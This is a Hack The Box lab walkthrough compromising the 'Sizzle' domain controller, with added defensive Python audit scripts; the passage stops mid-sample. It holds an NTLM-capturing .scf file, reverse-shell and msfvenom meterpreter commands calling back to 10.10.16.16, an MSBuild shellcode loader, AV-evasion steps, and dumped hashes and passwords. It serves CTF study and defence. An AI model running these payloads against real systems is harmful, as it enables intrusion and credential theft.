HTB Walkthrough (Active Directory 101: Sizzle)

Published: 2024/11/15 6:00:02

nmap scan

nmap -A -T4 10.129.4.79
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 02:44 EST
Stats: 0:02:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.83% done; ETC: 02:47 (0:00:00 remaining)
Nmap scan report for 10.129.4.79
Host is up (0.25s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
21/tcp   open  ftp               Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp   open  domain            Simple DNS Plus
80/tcp   open  http              Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-01-30T07:48:13+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
443/tcp  open  ssl/http          Microsoft IIS httpd 10.0
|_ssl-date: 2023-01-30T07:48:11+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
| tls-alpn:
|   h2
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-01-30T07:48:11+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-01-30T07:48:12+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
3269/tcp open  globalcatLDAPssl?
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
|_ssl-date: 2023-01-30T07:48:11+00:00; 0s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-01-30T07:46:47
|_  start_date: 2023-01-30T07:43:39

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   126.89 ms 10.10.16.1
2   126.92 ms 10.129.4.79

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.10 seconds
The nmap scan shows the target is a domain controller (Domain: HTB.LOCAL) with ports 80 and 21 open. The plan: look at the web page on port 80 and check whether FTP allows anonymous login.

Trying anonymous FTP login

Anonymous login works but the FTP root is empty, so move on to smbclient.
smbclient help output
smbclient --help
Usage: smbclient [OPTIONS] service <password>
  -M, --message=HOST                           Send message
  -I, --ip-address=IP                          Use this IP to connect to
  -E, --stderr                                 Write messages to stderr instead of stdout
  -L, --list=HOST                              Get a list of shares available on a host
  -T, --tar=<c|x>IXFvgbNan                     Command line tar
  -D, --directory=DIR                          Start from directory
  -c, --command=STRING                         Execute semicolon separated commands
  -b, --send-buffer=BYTES                      Changes the transmit/send buffer
  -t, --timeout=SECONDS                        Changes the per-operation timeout
  -p, --port=PORT                              Port to connect to
  -g, --grepable                               Produce grepable output
  -q, --quiet                                  Suppress help message
  -B, --browse                                 Browse SMB servers using DNS

Help options:
  -?, --help                                   Show this help message
      --usage                                  Display brief usage message

Common Samba options:
  -d, --debuglevel=DEBUGLEVEL                  Set debug level
      --debug-stdout                           Send debug output to standard output
  -s, --configfile=CONFIGFILE                  Use alternative configuration file
      --option=name=value                      Set smb.conf option from command line
  -l, --log-basename=LOGFILEBASE               Basename for log/debug files
      --leak-report                            enable talloc leak reporting on exit
      --leak-report-full                       enable full talloc leak reporting on exit

Connection options:
  -R, --name-resolve=NAME-RESOLVE-ORDER        Use these name resolution services only
  -O, --socket-options=SOCKETOPTIONS           socket options to use
  -m, --max-protocol=MAXPROTOCOL               Set max protocol level
  -n, --netbiosname=NETBIOSNAME                Primary netbios name
      --netbios-scope=SCOPE                    Use this Netbios scope
  -W, --workgroup=WORKGROUP                    Set the workgroup name
      --realm=REALM                            Set the realm name

Credential options:
  -U, --user=[DOMAIN/]USERNAME[%PASSWORD]      Set the network username
  -N, --no-pass                                Don't ask for a password
      --password=STRING                        Password
      --pw-nt-hash                             The supplied password is the NT hash
  -A, --authentication-file=FILE               Get the credentials from a file
  -P, --machine-pass                           Use stored machine account password
      --simple-bind-dn=DN                      DN to use for a simple bind
      --use-kerberos=desired|required|off      Use Kerberos authentication
      --use-krb5-ccache=CCACHE                 Credential cache location for Kerberos
      --use-winbind-ccache                     Use the winbind ccache for authentication
      --client-protection=sign|encrypt|off     Configure used protection for client connections

Deprecated legacy options:
  -k, --kerberos                               DEPRECATED: Migrate to --use-kerberos

Version options:
  -V, --version                                Print version
Command: smbclient -N -L //10.129.4.79
Output:
WARNING: no network interfaces found

	Sharename         Type      Comment
	---------         ----      -------
	ADMIN$            Disk      Remote Admin
	C$                Disk      Default share
	CertEnroll        Disk      Active Directory Certificate Services share
	Department Shares Disk
	IPC$              IPC       Remote IPC
	NETLOGON          Disk      Logon server share
	Operations        Disk
	SYSVOL            Disk      Logon server share
SMB1 disabled -- no workgroup available
Command to check access to every share in turn:
smbclient -N -L \\\\10.129.4.79 | grep Disk | sed 's/^\s*\(.*\)\s*Disk.*/\1/' | while read share; do echo "======${share}======"; smbclient -N "//10.129.4.79/${share}" -c dir; echo; done
Output:
WARNING: no network interfaces found
======ADMIN$======
WARNING: no network interfaces found
tree connect failed: NT_STATUS_ACCESS_DENIED

======C$======
WARNING: no network interfaces found
tree connect failed: NT_STATUS_ACCESS_DENIED

======CertEnroll======
WARNING: no network interfaces found
NT_STATUS_ACCESS_DENIED listing \*

======Department Shares======
WARNING: no network interfaces found
  .                                   D        0  Tue Jul  3 11:22:32 2018
  ..                                  D        0  Tue Jul  3 11:22:32 2018
  Accounting                          D        0  Mon Jul  2 15:21:43 2018
  Audit                               D        0  Mon Jul  2 15:14:28 2018
  Banking                             D        0  Tue Jul  3 11:22:39 2018
  CEO_protected                       D        0  Mon Jul  2 15:15:01 2018
  Devops                              D        0  Mon Jul  2 15:19:33 2018
  Finance                             D        0  Mon Jul  2 15:11:57 2018
  HR                                  D        0  Mon Jul  2 15:16:11 2018
  Infosec                             D        0  Mon Jul  2 15:14:24 2018
  Infrastructure                      D        0  Mon Jul  2 15:13:59 2018
  IT                                  D        0  Mon Jul  2 15:12:04 2018
  Legal                               D        0  Mon Jul  2 15:12:09 2018
  M&A                                 D        0  Mon Jul  2 15:15:25 2018
  Marketing                           D        0  Mon Jul  2 15:14:43 2018
  R&D                                 D        0  Mon Jul  2 15:11:47 2018
  Sales                               D        0  Mon Jul  2 15:14:37 2018
  Security                            D        0  Mon Jul  2 15:21:47 2018
  Tax                                 D        0  Mon Jul  2 15:16:54 2018
  Users                               D        0  Tue Jul 10 17:39:32 2018
  ZZ_ARCHIVE                          D        0  Mon Jul  2 15:32:58 2018

		7779839 blocks of size 4096. 3597277 blocks available

======NETLOGON======
WARNING: no network interfaces found
NT_STATUS_ACCESS_DENIED listing \*

======Operations======
WARNING: no network interfaces found
NT_STATUS_ACCESS_DENIED listing \*

======SYSVOL======
WARNING: no network interfaces found
NT_STATUS_ACCESS_DENIED listing \*
The Department Shares share is browsable anonymously. For convenience, mount it locally over CIFS:
mkdir temp2
mount -t cifs "//10.129.4.79/Department Shares" temp2
Inside it, Users/Public turns out to be writable.

Getting a foothold

A .scf (shell command) file is rendered by Windows Explorer: when a user browses the directory containing it, Explorer opens an SMB connection to the host named in IconFile to fetch the icon, which triggers NTLM authentication and leaks the user's Net-NTLMv2 hash.
pwn.scf contains:
[Shell]
Command=2
IconFile=\\10.10.16.16\share\pwn.ico
[Taskbar]
Command=ToggleDesktop
Copy it into the target directories:
cp pwn.scf /temp2/Users/Public
cp pwn.scf /temp2/ZZ_ARCHIVE
Start Responder
Download:
git clone https://github.com/lgandx/Responder.git
Run:
python3 Responder.py -I tun0
The captured Net-NTLMv2 hash:
[SMB] NTLMv2-SSP Client   : 10.129.4.79
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash     : amanda::HTB:abfb75bed96f62f2:1CFE3A78E919E4E738C635174293647A:
01010000000000008018889B6134D90188E495ABD0B9F5680000000002000800310053005200450001001E0057
0049004E002D004D00340036003200450048003600410042003500340004003400570049004E002D004D003400
3600320045004800360041004200350034002E0031005300520045002E004C004F00430041004C000300140031
005300520045002E004C004F00430041004C000500140031005300520045002E004C004F00430041004C000700
08008018889B6134D901060004000200000008003000300000000000000001000000002000008054EB7C62FABC
4F76A28F58E23A0DE80911AE7B10AAB6E6A11DA195F18AD1C30A00100000000000000000000000000000000000
0900200063006900660073002F00310030002E00310030002E00310036002E0031003600000000000000000000
000000
[+] Exiting...
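As a defender-side counterpart to the SCF trick above, here is an added example (not from the original write-up) that walks a mounted share and flags .scf files whose IconFile points at a UNC host outside an allowlist. The TRUSTED_UNC_HOSTS set, the temporary share layout and the sample files are constructed for the example; the malicious sample reuses the pwn.scf content shown above.

```python
import configparser
import os
import re
import tempfile
from pathlib import Path

# Assumption: hosts that legitimately serve icons over UNC paths. A defender would
# fill this from their own file-server inventory; these names are constructed.
TRUSTED_UNC_HOSTS = {"fileserver01.htb.local", "sizzle.htb.local"}

# \\host\share\... : capture the host component of a UNC path
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def parse_scf_iconfile(text):
    """Return the [Shell] IconFile value of an SCF file, or None if absent/unparseable.
    SCF files are INI-style, so configparser handles them."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case as written
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    if cp.has_section("Shell"):
        return cp.get("Shell", "IconFile", fallback=None)
    return None


def unc_host(path):
    """Host part of a UNC path (lower-cased), or None for local/non-UNC paths."""
    m = UNC_RE.match(path or "")
    return m.group(1).lower() if m else None


def scan_share(root):
    """Walk a mounted share and report every .scf whose icon is fetched from an untrusted host.
    Such a file makes every Explorer client that browses the folder authenticate to that host."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            p = Path(dirpath) / name
            try:
                text = p.read_text(errors="replace")
            except OSError:
                continue
            icon = parse_scf_iconfile(text)
            host = unc_host(icon)
            if host and host not in TRUSTED_UNC_HOSTS:
                findings.append({"file": str(p), "icon_host": host, "icon": icon})
    return findings


def build_demo_share():
    """Create a constructed temp directory mimicking the Department Shares layout."""
    root = Path(tempfile.mkdtemp(prefix="share_"))
    (root / "Users" / "Public").mkdir(parents=True)
    (root / "ZZ_ARCHIVE").mkdir()
    # Constructed malicious SCF: icon hosted on an attacker machine (content from the walkthrough)
    (root / "Users" / "Public" / "pwn.scf").write_text(
        "[Shell]\nCommand=2\nIconFile=\\\\10.10.16.16\\share\\pwn.ico\n[Taskbar]\nCommand=ToggleDesktop\n"
    )
    # Constructed benign SCF: icon served by a trusted internal file server
    (root / "ZZ_ARCHIVE" / "desktop.scf").write_text(
        "[Shell]\nCommand=2\nIconFile=\\\\fileserver01.htb.local\\icons\\folder.ico\n"
    )
    # Constructed benign SCF: local icon resource, no network fetch at all
    (root / "ZZ_ARCHIVE" / "local.scf").write_text(
        "[Shell]\nCommand=2\nIconFile=C:\\Windows\\System32\\shell32.dll,3\n"
    )
    return root


if __name__ == "__main__":
    for f in scan_share(build_demo_share()):
        print(f"{f['file']}: IconFile -> {f['icon_host']} (untrusted)")
```

Run it against the mount point of any writable share (Users/Public here) as a periodic check; pairing it with a hash-based file-integrity baseline catches SCF, .url and .lnk drops the same way.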

Cracking the password with hashcat

amanda.hash contains the hash line captured by Responder above:
amanda::HTB:abfb75bed96f62f…
hashcat command:
hashcat -m 5600 amanda.hash /usr/share/wordlists/rockyou.txt --force
Cracked password: Ashare1972

Checking the user's SMB share permissions with smbmap

Command: smbmap -H 10.10.10.103 -u amanda -p Ashare1972
Output:
[+] IP: 10.129.4.79:445	Name: 10.129.4.79
	Disk                                                    Permissions	Comment
	----                                                    -----------	-------
	ADMIN$                                                  NO ACCESS	Remote Admin
	C$                                                      NO ACCESS	Default share
	CertEnroll                                              NO ACCESS	Active Directory Certificate Services share
	Department Shares                                       NO ACCESS
	IPC$                                                    READ ONLY	Remote IPC
	NETLOGON                                                READ ONLY	Logon server share
	Operations                                              NO ACCESS
	SYSVOL                                                  READ ONLY	Logon server share
Accessing the CertEnroll share with smbclient
Command: smbclient -U 'amanda%Ashare1972' //10.129.4.79/CertEnroll
Output:
WARNING: no network interfaces found
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 30 02:44:00 2023
  ..                                  D        0  Mon Jan 30 02:44:00 2023
  HTB-SIZZLE-CA+.crl                  A      721  Mon Jan 30 02:44:00 2023
  HTB-SIZZLE-CA.crl                   A      909  Mon Jan 30 02:44:00 2023
  nsrev_HTB-SIZZLE-CA.asp             A      322  Mon Jul  2 16:36:05 2018
  sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt  A      871  Mon Jul  2 16:36:03 2018

		7779839 blocks of size 4096. 3707264 blocks available
Plenty of certificate material here, but nothing directly exploitable.

Collecting domain information with BloodHound.py

Command: python /home/kali/Desktop/AD/BloodHound.py-master/bloodhound.py -u amanda -p Ashare1972 -d htb.local -ns 10.129.3.137 -c DcOnly
(The machine was restarted, so its IP changed.)

Analysis shows AMANDA@HTB.LOCAL is a member of REMOTE MANAGEMENT USERS@HTB.LOCAL, so a remote login is worth trying.

The same group also contains MRLKY@HTB.LOCAL, who has DCSync rights over HTB.LOCAL.
The plan is to log in to the target as AMANDA and see whether MRLKY's or a domain administrator's privileges can be reached. The domain administrators are the main target:

Logging in with the amanda account

WinRM login with username and password fails; it evidently requires certificate authentication.
http://10.129.3.137/certsrv is reachable; certsrv is Active Directory Certificate Services.
Log in there as amanda, and use openssl to generate a private key and a certificate signing request (CSR):
Command: openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr
cat amanda.csr
Output:
-----BEGIN CERTIFICATE REQUEST-----
…
-----END CERTIFICATE REQUEST-----
Submit the CSR and download the issued certificate from:
http://10.129.240.148/certsrv

Download the WinRM shell script:
https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell.rb
Use the following script:
#!/usr/bin/ruby
require 'winrm'
# Author: Alamot
conn = WinRM::Connection.new(
  endpoint: 'https://10.129.3.137:5986/wsman',
  transport: :ssl,
  client_cert: '/home/kali/Desktop/temp2/oepnssl/certnew.cer',
  client_key: '/home/kali/Desktop/temp2/oepnssl/amanda.key',
  :no_ssl_peer_verification => true
)
command = ""
conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    # Build a prompt that mirrors the remote user, host and current directory
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
The connection is over SSL to port 5986 of the target, with the client certificate and key specified; once connected you get a PowerShell prompt directly.
Adjust endpoint, client_cert and client_key to match your own files.
Login succeeded:

It turns out to be a constrained environment, as these two commands show:
$executioncontext.sessionstate.languagemode
Get-AppLockerPolicy -Effective -XML

Bypassing CLM with PSByPassCLM

Download: https://github.com/padovah4ck/PSByPassCLM
Serve the build under /home/…/PSBypassCLM/obj/x64/Debug over HTTP for download.
Note that the x86 or debug variants cannot be used; they hang.
python3 -m http.server 80
Download command: wget http://10.10.16.16/PsBypassCLM.exe -OutFile PsBypassCLM.exe

Start a listener on the attack machine: rlwrap nc -nvlp 5555
Run a command through PsBypassCLM to bypass CLM and get a reverse shell:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.16.16 /rport=4444 /U C:\Users\amanda\Documents\PsBypassCLM.exe
Port 88 is open, so Kerberoasting can be attempted.

Bypassing AV and AppLocker

Kerberoasting with Rubeus
Download: https://github.com/GhostPack/Rubeus
After uploading it, Group Policy prevents it from running directly, so a bypass is needed.

MSBuild can be used to execute the code: it is a trusted Microsoft binary, so it passes AppLocker, and it compiles XML C# project files.
Reference: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild
XML download: https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml
Contents:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
          using System.Runtime.InteropServices;
          using Microsoft.Build.Framework;
          using Microsoft.Build.Utilities;

          public class ClassExample : Task, ITask
          {
            private static UInt32 MEM_COMMIT = 0x1000;
            private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

            [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

            [DllImport("kernel32")]
            private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

            [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

            public override bool Execute()
            {
              // Sample 32-bit shellcode shipped with the file (it launches calc.exe);
              // the walkthrough replaces it with msfvenom -f csharp output
              byte[] shellcode = new byte[195] {0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };
              UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
              Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
              IntPtr hThread = IntPtr.Zero;
              UInt32 threadId = 0;
              IntPtr pinfo = IntPtr.Zero;
              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
              WaitForSingleObject(hThread, 0xFFFFFFFF);
              return true;
            }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
Generating shellcode with MSF for the callback
Command: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.16.10 LPORT=6666 -f csharp
Compile: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\amanda\Documents\shellcode.xml
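Added example, not from the original write-up or the projects it references: a small audit script that evaluates an exported AppLocker policy (the output of Get-AppLockerPolicy -Effective -XML, as run above) against the trusted .NET binaries this section abuses, MSBuild.exe and InstallUtil.exe. It models only FilePathRule with Conditions and Exceptions and the Deny-before-Allow order; the two policies, the placeholder rule Ids and the LOLBIN_PATHS list are constructed.

```python
import fnmatch
import xml.etree.ElementTree as ET

# Constructed list: trusted .NET hosts that a default "allow %WINDIR%\*" rule lets through.
# These are the two binaries the walkthrough uses (MSBuild.exe, InstallUtil.exe).
LOLBIN_PATHS = [
    r"%WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
    r"%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
    r"%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
    r"%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
]

# Constructed policy: only the default "Windows folder" and "Program Files" allow rules.
WEAK_POLICY = r"""<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="00000000-0000-0000-0000-000000000001" Name="(Default Rule) All files located in the Windows folder" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000002" Name="(Default Rule) All files located in the Program Files folder" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>"""

# Constructed policy: same defaults plus explicit Deny rules for the two .NET hosts.
HARDENED_POLICY = WEAK_POLICY.replace(
    "  </RuleCollection>",
    r"""    <FilePathRule Id="00000000-0000-0000-0000-000000000003" Name="Deny MSBuild" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%WINDIR%\Microsoft.NET\*\MSBuild.exe" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000004" Name="Deny InstallUtil" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%WINDIR%\Microsoft.NET\*\InstallUtil.exe" /></Conditions>
    </FilePathRule>
  </RuleCollection>""",
)


def _matches(pattern, path):
    """AppLocker path conditions are case-insensitive and use '*' as a wildcard
    that may span directory separators; fnmatch gives the same behaviour."""
    return fnmatch.fnmatchcase(path.lower(), pattern.lower())


def exe_enforcement_mode(policy_xml):
    """EnforcementMode of the Exe collection; a Deny rule means nothing in AuditOnly."""
    root = ET.fromstring(policy_xml)
    for coll in root.iter("RuleCollection"):
        if coll.get("Type") == "Exe":
            return coll.get("EnforcementMode", "NotConfigured")
    return "NotConfigured"


def evaluate_exe_path(policy_xml, path):
    """Return 'Deny', 'Allow' or 'NotCovered' for an Exe path (simplified AppLocker semantics:
    an explicit Deny wins over any Allow; Exceptions remove a rule's match; user SIDs,
    publisher and hash rules are not modelled)."""
    root = ET.fromstring(policy_xml)
    decision = "NotCovered"
    for coll in root.iter("RuleCollection"):
        if coll.get("Type") != "Exe":
            continue
        for rule in coll.findall("FilePathRule"):
            conds = [c.get("Path") for c in rule.findall("Conditions/FilePathCondition")]
            excs = [c.get("Path") for c in rule.findall("Exceptions/FilePathCondition")]
            if not any(_matches(c, path) for c in conds):
                continue
            if any(_matches(x, path) for x in excs):
                continue
            if rule.get("Action") == "Deny":
                return "Deny"
            decision = "Allow"
    return decision


def audit_lolbins(policy_xml):
    """Map each known trusted-host path to the policy's decision for it."""
    return {p: evaluate_exe_path(policy_xml, p) for p in LOLBIN_PATHS}


if __name__ == "__main__":
    for label, pol in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(f"[{label}] Exe enforcement: {exe_enforcement_mode(pol)}")
        for path, verdict in audit_lolbins(pol).items():
            print(f"  {verdict:10s} {path}")
```

The weak policy, which is what the default rule set gives you, reports Allow for all four paths; the hardened one reports Deny while still allowing ordinary Windows binaries and leaving files in a user profile (such as the uploaded PsBypassCLM.exe) uncovered, which under an enforced policy means blocked.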

AV killed it. A simple way past AV is to obfuscate the shellcode with an encoder:
Command: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.16.16 LPORT=8888 -e x86/shikata_ga_nai -i 100 -f csharp
Start the msf listener:

It still failed to call back, probably because of AV; switching to a Cobalt Strike payload with AV evasion, the beacon checked in successfully.

Browsing the file system, the system32 directory contains a file.txt holding the following credentials:

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c718f548c75062ada93250db208d3178:::

Domain    User  ID  Hash
------    ----  --  ----
HTB.LOCAL Guest 501 -
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrb3n:1105:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
At this point the box is effectively finished: the domain admin credentials, and those of MRLKY@HTB.LOCAL identified in the BloodHound analysis, are all here. In a real engagement this basically never happens; it is presumably there because this is an HTB lab and the difficulty was lowered. The rest of the write-up assumes these credentials were not obtained and continues the attack path.

Kerberoasting

Open a tunnel with Cobalt Strike:

Check the previously configured proxy tunnel:

Note that the IP configured in proxychains or the proxy tool is not the target but the Cobalt Strike server.

With the proxy in place, use GetUserSPNs.py from impacket to fetch the SPNs
Command: proxychains python3 GetUserSPNs.py -request -dc-ip 10.129.240.148 HTB.LOCAL/amanda:Ashare1972
Output:

The request failed:

Export the ticket with Cobalt Strike's mimikatz instead
First request the service ticket into memory with PowerShell
Commands:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "http/sizzle"
When exporting with mimikatz from CS, note that the beacon currently runs with low privileges, so cd into a directory the account can write to before exporting the ticket
Command:
mimikatz kerberos::list /export
Output:

Download the ticket:

Crack it with tgsrepcrack.py
Download:
https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py
Command: python3 tgsrepcrack.py /home/kali/Desktop/temp/password.txt /home/kali/Desktop/temp/1-40a10000-amanda@http~sizzle-HTB.LOCAL.kirbi
Cracked password: Football#7
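Added example, not part of the original write-up: detection logic for the Kerberoasting step above, run over constructed Windows Security event 4769 (service ticket requested) records. A TGS request for a user account's SPN with RC4-HMAC (TicketEncryptionType 0x17) is the classic Kerberoast signal, since the attacker downgrades to the cheapest cipher to crack, and one principal requesting tickets for several such services in a short window is an SPN sweep. Field names follow the real 4769 event; the JSON-lines shape, the threshold and the window are assumptions, and the sample records are constructed.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                       # 4769 TicketEncryptionType for RC4-HMAC
SWEEP_THRESHOLD = 3                   # distinct user-SPN services by one account ... (assumed)
SWEEP_WINDOW = timedelta(minutes=5)   # ... within this window is treated as a sweep (assumed)

# Constructed sample 4769 events as JSON lines (roughly what a SIEM forwards). Not real logs.
SAMPLE_4769 = """
{"TimeCreated":"2023-01-30T08:01:10","TargetUserName":"amanda@HTB.LOCAL","ServiceName":"SIZZLE$","TicketEncryptionType":"0x12","IpAddress":"::ffff:10.129.4.80","Status":"0x0"}
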